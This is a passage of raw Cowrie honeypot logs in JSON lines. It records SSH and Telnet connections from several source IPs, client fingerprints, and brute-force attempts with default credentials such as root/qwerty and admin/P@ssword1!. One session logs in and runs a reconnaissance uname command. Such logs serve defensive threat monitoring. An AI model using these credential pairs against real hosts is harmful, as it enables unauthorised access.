0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:41:13.769340Z","src_ip":"45.125.211.194","session":"f0f39e2514a7"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:41:14.609421Z","src_ip":"45.125.211.194","session":"f0f39e2514a7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:41:15.822238Z","src_ip":"45.125.211.194","session":"f0f39e2514a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46138,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d88f8075758","protocol":"ssh","message":"New connection: 212.227.235.229:46138 (1.2.3.4:22) [session: 8d88f8075758]","sensor":"my-vps","timestamp":"2025-08-28T03:41:22.364118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:41:22.373992Z","src_ip":"212.227.235.229","session":"8d88f8075758"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:41:22.514877Z","src_ip":"212.227.235.229","session":"8d88f8075758"}
{"eventid":"cowrie.login.failed","username":"rmsadm","password":"rmsadm","message":"login attempt [rmsadm/rmsadm] failed","sensor":"my-vps","timestamp":"2025-08-28T03:41:23.322961Z","src_ip":"212.227.235.229","session":"8d88f8075758"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:41:24.444096Z","src_ip":"212.227.235.229","session":"8d88f8075758"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":30385,"dst_ip":"1.2.3.4","dst_port":22,"session":"41ff314f1cbb","protocol":"ssh","message":"New connection: 45.125.211.194:30385 (1.2.3.4:22) [session: 41ff314f1cbb]","sensor":"my-vps","timestamp":"2025-08-28T03:41:28.354621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:41:28.376916Z","src_ip":"45.125.211.194","session":"41ff314f1cbb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:41:28.569148Z","src_ip":"45.125.211.194","session":"41ff314f1cbb"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:41:29.401083Z","src_ip":"45.125.211.194","session":"41ff314f1cbb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:41:30.612204Z","src_ip":"45.125.211.194","session":"41ff314f1cbb"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":23363,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cae0587881b","protocol":"ssh","message":"New connection: 45.125.211.194:23363 (1.2.3.4:22) [session: 6cae0587881b]","sensor":"my-vps","timestamp":"2025-08-28T03:41:43.126646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:41:43.143912Z","src_ip":"45.125.211.194","session":"6cae0587881b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:41:43.340193Z","src_ip":"45.125.211.194","session":"6cae0587881b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4890,"dst_ip":"1.2.3.4","dst_port":23,"session":"261b7b9cb1cd","protocol":"telnet","message":"New connection: 212.227.125.160:4890 (1.2.3.4:23) [session: 261b7b9cb1cd]","sensor":"my-vps","timestamp":"2025-08-28T03:41:43.986803Z"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:41:44.177289Z","src_ip":"45.125.211.194","session":"6cae0587881b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:41:45.389381Z","src_ip":"45.125.211.194","session":"6cae0587881b"}
{"eventid":"cowrie.session.connect","src_ip":"103.29.70.204","src_port":42062,"dst_ip":"1.2.3.4","dst_port":22,"session":"b122ab9d6a0a","protocol":"ssh","message":"New connection: 103.29.70.204:42062 (1.2.3.4:22) [session: b122ab9d6a0a]","sensor":"my-vps","timestamp":"2025-08-28T03:41:54.911687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:41:54.912907Z","src_ip":"103.29.70.204","session":"b122ab9d6a0a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T03:41:55.170236Z","src_ip":"103.29.70.204","session":"b122ab9d6a0a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":42273,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb214f58af66","protocol":"ssh","message":"New connection: 45.125.211.194:42273 (1.2.3.4:22) [session: eb214f58af66]","sensor":"my-vps","timestamp":"2025-08-28T03:41:57.936821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:41:57.952923Z","src_ip":"45.125.211.194","session":"eb214f58af66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:41:58.163522Z","src_ip":"45.125.211.194","session":"eb214f58af66"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:41:59.043298Z","src_ip":"45.125.211.194","session":"eb214f58af66"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:00.265396Z","src_ip":"45.125.211.194","session":"eb214f58af66"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:04.912635Z","src_ip":"103.29.70.204","session":"b122ab9d6a0a"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":52710,"dst_ip":"1.2.3.4","dst_port":22,"session":"1968ebdb598d","protocol":"ssh","message":"New connection: 194.233.79.134:52710 (1.2.3.4:22) [session: 1968ebdb598d]","sensor":"my-vps","timestamp":"2025-08-28T03:42:06.586641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:42:06.757550Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:42:08.616705Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:42:09.612067Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:42:10.189798Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:42:10.190563Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:10.393511Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:10.394739Z","src_ip":"194.233.79.134","session":"1968ebdb598d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16555,"dst_ip":"1.2.3.4","dst_port":22,"session":"36c2260b5e09","protocol":"ssh","message":"New connection: 45.125.211.194:16555 (1.2.3.4:22) [session: 36c2260b5e09]","sensor":"my-vps","timestamp":"2025-08-28T03:42:12.684770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:42:12.697017Z","src_ip":"45.125.211.194","session":"36c2260b5e09"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:42:12.897088Z","src_ip":"45.125.211.194","session":"36c2260b5e09"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-28T03:42:13.732883Z","src_ip":"45.125.211.194","session":"36c2260b5e09"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:14.943505Z","src_ip":"45.125.211.194","session":"36c2260b5e09"}
{"eventid":"cowrie.session.closed","duration":31.268933057785034,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:15.255670Z","src_ip":"212.227.125.160","session":"261b7b9cb1cd"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58255,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fd96c893631","protocol":"ssh","message":"New connection: 45.125.211.194:58255 (1.2.3.4:22) [session: 1fd96c893631]","sensor":"my-vps","timestamp":"2025-08-28T03:42:27.532962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:42:27.547988Z","src_ip":"45.125.211.194","session":"1fd96c893631"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:42:27.742236Z","src_ip":"45.125.211.194","session":"1fd96c893631"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:42:28.575209Z","src_ip":"45.125.211.194","session":"1fd96c893631"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:29.785641Z","src_ip":"45.125.211.194","session":"1fd96c893631"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46139,"dst_ip":"1.2.3.4","dst_port":22,"session":"62cc7b24d4ed","protocol":"ssh","message":"New connection: 212.227.235.229:46139 (1.2.3.4:22) [session: 62cc7b24d4ed]","sensor":"my-vps","timestamp":"2025-08-28T03:42:32.427656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:42:32.493588Z","src_ip":"212.227.235.229","session":"62cc7b24d4ed"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:42:32.591246Z","src_ip":"212.227.235.229","session":"62cc7b24d4ed"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssword1!","message":"login attempt [admin/P@ssword1!] failed","sensor":"my-vps","timestamp":"2025-08-28T03:42:33.053065Z","src_ip":"212.227.235.229","session":"62cc7b24d4ed"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:34.153301Z","src_ip":"212.227.235.229","session":"62cc7b24d4ed"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":61629,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fc5d6e53dc7","protocol":"ssh","message":"New connection: 45.125.211.194:61629 (1.2.3.4:22) [session: 0fc5d6e53dc7]","sensor":"my-vps","timestamp":"2025-08-28T03:42:42.263706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:42:42.290057Z","src_ip":"45.125.211.194","session":"0fc5d6e53dc7"}
